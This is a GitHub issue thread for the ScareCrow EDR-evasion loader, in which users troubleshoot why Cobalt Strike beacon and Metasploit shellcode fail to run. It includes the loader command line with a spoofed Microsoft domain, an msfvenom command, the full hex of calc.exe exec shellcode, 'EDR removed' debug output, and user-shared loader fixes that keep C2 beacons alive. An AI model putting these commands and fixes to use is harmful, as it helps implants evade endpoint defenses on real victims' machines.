Is this project still working? experiencing issues loading several shellcodes #69
Comments
|
Yes, this project is very much still working. It looks like it's your shellcode, unfortunately, I can't help you as not sure what your shellcode looks like (posting debug outputs don't help me when I don't know what's being loaded) It could be a UDRL in the case of cobalt strike or something else. Based on your output, I suggest you try some of the other loaders built into Scarecrow. |
|
Ok will do some research and update on this thanks for a quick response :) |
|
Posting the calc shellcode used: \xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00 Maybe it's the null bytes? |
|
Tried without null bytes as well still not working, will check it further out and update |
|
FYI @sl4cky I was running into this same issue with fresh stageless shellcode for CS. I unloaded my UDRL and made a new payload with ScareCrow and everything was resolved. |
|
It shoulds like it could be a UDRL issue. Hard to know with out know for sure with out all the details of the C2 and other things going into your payload. |
|
I ended up getting this error too, in my case the "image_size_x64" value was too low and c2lint called it out too. Not sure if this related to more recent changes because the profile used to work but maybe this helps. I also ran into an issue where the binary output is unreliable. Sometimes it straight exits, other times I can see the beacon come in and then die (sometimes after a few successful sleep cycles). I turned off any custom settings in the profile/UDRL but the issue persisted. I ended up modifying the loader routine so it uses virtualalloc + write (just like the DLL loader) instead of the pointer trickery + virtualprotect. This solved it and it is now consistently triggering and stays alive. Again it used to work so maybe latest CS changes are causing an access violation somewhere? |
|
Came back to say that I'm experiencing similar issues to @ptr0x1. With bone stock CS shellcode (4.8 release), I will very rarely get a beacon callback, and if I do it dies shortly after. Same outcome for binary payloads and DLLs, so something must be causing issues with the new CS versions; as my previous comment was from old CS shellcode (< 4.7). I'm going to tinker with this a good bit in the coming days and see if I can find some answers. |
|
I was able to implement the fix @ptr0x1 spoke about (using the DLL loader for the Binary template) and everything works fine. @Tylous I didn't submit a PR for it since it's not really a fix, but the code's in my fork here: https://github.com/chucksploit/ScareCrow. I'm still trying to see what the root cause is. |
|
I am working on a new version (which should be out shortly) that removes the old binary template with 4 new ones. The Binary template no longer works with the latest versions of golang. As a result the new version will provide several universal templates. |
|
ScareCrow 5.0 is out now, this should take of this, please feel free to re-open this if you experience it still. |
I tested the framework using different shellcodes but I keep getting errors, or nothing happens , have used console output for debug.
./ScareCrow -I beacon.bin -domain www.microsoft.com -console
The shellcode is a stageless cobalt shellcode. I'm getting the following output from console and there is no callback to c2:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
also tried with metasploit calc shellcode:
msfvenom -p windows/x64/exec CMD="calc.exe" -f raw -o ok.bin
using the same flags as previous and the following error on console:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [] Create a Pointer on stack
[DEBUG] [] Loading shellcode into a string
[DEBUG] [] Copy Pointer's attributes
[DEBUG] [] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
Exception 0xc0000005 0x0 0x1b11ab67000 0xc000138000
PC=0xc000138000
runtime.cgocall(0xf0b60, 0x267ec0)
runtime/cgocall.go:158 +0x4a fp=0xc000107e18 sp=0xc000107de0 pc=0x935ea
rnmzBzfN.JjYY7ypK(0xc000138000?, {0xc000107eb0?, 0x3?, 0x9c767?})
runtime/syscall_windows.go:557 +0x109 fp=0xc000107e90 sp=0xc000107e18 pc=0xebea9
rnmzBzfN.ES5BzOlzgpnB(0x180050?, 0xc000013170?, 0x5?, 0x5?, 0x0?)
runtime/syscall_windows.go:495 +0x3b fp=0xc000107ed8 sp=0xc000107e90 pc=0xebc7b
main.main()
uSiSpGymJxKf.go:1 +0x2c7 fp=0xc000107f80 sp=0xc000107ed8 pc=0x154c07
runtime.main()
runtime/proc.go:250 +0x1fe fp=0xc000107fe0 sp=0xc000107f80 pc=0xc7bbe
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000107fe8 sp=0xc000107fe0 pc=0xef2c1
goroutine 2 [force gc (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000045fb0 sp=0xc000045f90 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.forcegchelper()
runtime/proc.go:302 +0xb1 fp=0xc000045fe0 sp=0xc000045fb0 pc=0xc7df1
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000045fe8 sp=0xc000045fe0 pc=0xef2c1
created by runtime.init.6
runtime/proc.go:290 +0x25
goroutine 3 [GC sweep wait]:
runtime.gopark(0x1?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000047f90 sp=0xc000047f70 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.bgsweep(0x0?)
runtime/mgcsweep.go:297 +0xd7 fp=0xc000047fc8 sp=0xc000047f90 pc=0xb2bd7
runtime.gcenable.func1()
runtime/mgc.go:178 +0x26 fp=0xc000047fe0 sp=0xc000047fc8 pc=0xa7926
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0xef2c1
created by runtime.gcenable
runtime/mgc.go:178 +0x6b
goroutine 4 [GC scavenge wait]:
runtime.gopark(0xc00001c070?, 0x1a8d00?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000057f70 sp=0xc000057f50 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.(*scavengerState).park(0x267800)
runtime/mgcscavenge.go:389 +0x53 fp=0xc000057fa0 sp=0xc000057f70 pc=0xb0c13
runtime.bgscavenge(0x0?)
runtime/mgcscavenge.go:622 +0x65 fp=0xc000057fc8 sp=0xc000057fa0 pc=0xb1225
runtime.gcenable.func2()
runtime/mgc.go:179 +0x26 fp=0xc000057fe0 sp=0xc000057fc8 pc=0xa78c6
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000057fe8 sp=0xc000057fe0 pc=0xef2c1
created by runtime.gcenable
runtime/mgc.go:179 +0xaa
goroutine 5 [finalizer wait]:
runtime.gopark(0x0?, 0x185b00?, 0x60?, 0x1?, 0x2000000020?)
runtime/proc.go:363 +0xd6 fp=0xc000049e28 sp=0xc000049e08 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.runfinq()
runtime/mfinal.go:180 +0x10f fp=0xc000049fe0 sp=0xc000049e28 pc=0xa6a2f
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000049fe8 sp=0xc000049fe0 pc=0xef2c1
created by runtime.createfing
runtime/mfinal.go:157 +0x45
goroutine 18 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000053f50 sp=0xc000053f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000053fe0 sp=0xc000053f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000053fe8 sp=0xc000053fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 34 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000515f50 sp=0xc000515f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000515fe0 sp=0xc000515f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000515fe8 sp=0xc000515fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 35 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000517f50 sp=0xc000517f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000517fe0 sp=0xc000517f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000517fe8 sp=0xc000517fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 36 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000511f50 sp=0xc000511f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000511fe0 sp=0xc000511f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000511fe8 sp=0xc000511fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 19 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000055f50 sp=0xc000055f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000055fe0 sp=0xc000055f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000055fe8 sp=0xc000055fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 6 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000059f50 sp=0xc000059f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000059fe0 sp=0xc000059f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000059fe8 sp=0xc000059fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 37 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000513f50 sp=0xc000513f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000513fe0 sp=0xc000513f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000513fe8 sp=0xc000513fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 38 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000525f50 sp=0xc000525f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000525fe0 sp=0xc000525f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000525fe8 sp=0xc000525fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
rax 0xc000138000
rbx 0x267ec0
rcx 0x0
rdi 0xf11aa2f000
rsi 0xc000107e50
rbp 0xc000107e08
rsp 0xf11adffcc8
r8 0x0
r9 0x0
r10 0x0
r11 0x202
r12 0xc000013170
r13 0x0
r14 0xc000042000
r15 0xffffffffffffffff
rip 0xc000138000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b
The text was updated successfully, but these errors were encountered: